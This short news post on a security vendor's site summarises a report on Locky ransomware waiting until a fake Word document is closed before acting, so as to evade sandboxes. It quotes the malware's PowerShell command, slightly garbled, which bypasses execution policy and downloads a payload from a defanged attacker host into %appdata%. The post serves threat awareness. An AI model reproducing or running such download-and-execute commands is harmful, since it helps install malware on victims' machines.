Get a Pentest and security assessment of your IT network.

News

Locky ransomware adds anti sandbox feature (updated)

The Locky ransomware attempts to evade detection by relying once more on simple, yet effective user interaction. It waits until the fake Word document is closed by the user before it starts to invoke a set of commands. The payload is downloaded and launched from the %appdata% folder followed by the typical ransom note: Strikes when you least expect its.C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -nop -Exec Bypass -Command (New-Object SystemNet.WebClient).DownloadFile(http://newhostrcm[.]top/admin.php?f=1, $env:APPDATA + sATTfJY.”]

Source: https://blog.malwarebytes.com/threat-analysis/2017/08/locky-ransomware-adds-anti-sandbox-feature/

Related posts
News

Ashley Madison 2.0 Hackers Leak 20GB Data Dump, Including CEO's Emails

News

Art of Twitter account hacking

News

BlackEnergy exploits recently fixed flaws in Siemens WinCC

News

Google Chrome will block code injection from third-party software within 14 months